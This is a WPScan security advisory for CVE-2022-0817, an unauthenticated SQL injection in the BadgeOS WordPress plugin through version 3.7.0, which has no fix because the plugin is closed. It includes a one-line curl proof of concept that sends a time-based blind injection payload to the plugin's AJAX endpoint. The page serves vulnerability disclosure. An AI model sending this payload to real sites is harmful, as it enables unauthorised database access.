WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

BadgeOS <= 3.7.0 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'

Affects Plugins

badgeos
No known fix - plugin closed

References

CVE
CVE-2022-0817

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
69263610-f454-4f27-80af-be523d25659e

Timeline

Publicly Published

2022-04-13 (about 2 months ago)

Added

2022-04-13 (about 2 months ago)

Last Updated

2022-04-17 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin